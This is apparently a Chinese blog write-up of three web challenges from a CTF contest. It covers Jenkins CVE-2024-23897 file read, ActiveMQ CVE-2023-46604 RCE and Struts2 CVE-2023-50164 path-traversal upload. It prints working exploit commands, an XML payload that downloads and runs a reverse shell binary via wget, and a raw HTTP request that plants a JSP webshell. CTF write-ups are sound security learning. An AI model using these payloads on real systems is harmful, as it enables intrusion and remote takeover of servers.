长亭RW体验赛 Web WP

于 2024-01-31 00:00:00 发布
阅读量1.1k 收藏 7
点赞数 17
分类专栏: # 内网&提权&红蓝对抗 # 渗透测试 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q20010619/article/details/135907755
版权
本文讲述了如何参与安全应急响应,包括利用Jenkins任意文件读取漏洞CVE-2024-23897获取flag,以及利用ApacheStruts2的文件上传漏洞CVE-2023-50164进行目录穿越攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述

Be-a-Security-Researcher

题目描述:Participate in a security vulnerability emergency response

访问是一个 jenkins 题目描述中有写到参与应急响应,联想最近的 jenkins 任意文件读取漏洞 CVE-2024-23897

截屏2024-01-29 09.39.58

直接用 jenkins cli 工具连接拿到 flag

java -jar jenkins-cli.jar -s http://47.96.171.129:8080 who-am-i @/flag

截屏2024-01-29 09.43.25

Be-an-ActiveMq-Hacker

题目描述中提到了 CVE-2023-46604,题目也给出了附件

截屏2024-01-29 10.02.49

其中 readflag 是一个读取 flag 的程序

去 GitHub 找 poc

https://github.com/X1r0z/ActiveMQ-RCE

使用 go 写的,需要自己 build 下

go build -o rce main.go

截屏2024-01-29 10.04.26

尝试下 dnslog

./rce -i 120.26.63.137 -u http://8yfftp.dnslog.cn

截屏2024-01-29 10.07.16

可以收到但是后续尝试去在 poc.xml 中使用命令将 flag 带外失败 whoami 这种短的可以成功,最终使用 msf 创建反向马上线

<?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg >
            <list>
                <value>wget http://ip:port/ma;chmod +x ma;./ma</value>                
            </list>
            </constructor-arg>
        </bean>
    </beans>

Be-More-Elegant

题目描述:Grace Under Code, Be gentle please 😃

题目给了 war 包附件解压开看到是一个使用 struts2 开发的文件上传页面

截屏2024-01-29 10.04.26

截屏2024-01-29 10.25.59

顺着都是最近 cve 的思路,找 struts2 最近的漏洞

漏洞描述里提到可通过伪造文件上传的参数导致目录穿越,看版本比对,有两个 Commit 引起我的关注,一个是 Always delete uploaded file,另一个是 Makes HttpParameters case-insensitive。前者的作用是确保上传的临时文件被正确上传,在修复之前,通过构造超长的文件上传参数可以让临时文件继续留存在磁盘中

通过查看代码发现前端文件上传的名字是 fileUpload 和 FileUploadFileName,构造 poc

POST /upload.action?fileUploadFileName=../../../views/11.jsp HTTP/1.1
Host: 47.99.57.31:8080
Content-Length: 800
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://47.99.57.31:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUWVN4CxLM6PhrCD8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://47.99.57.31:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=04F3BF3B7A49D8A0982A70C414AA44AB
Connection: close

------WebKitFormBoundaryUWVN4CxLM6PhrCD8
Content-Disposition: form-data; name="FileUpload"; filename="11.jsp"
Content-Type: text/plain

大马

------WebKitFormBoundaryUWVN4CxLM6PhrCD8--

试了几次在 post 中传没有成功,get 可以,直接上传一个大马去读文件,如果上传失败可以将 name=“FileUpload”; 中的 F 改成小写上传一次,再改成大写上传

截屏2024-01-29 10.57.16
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

OceanSec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值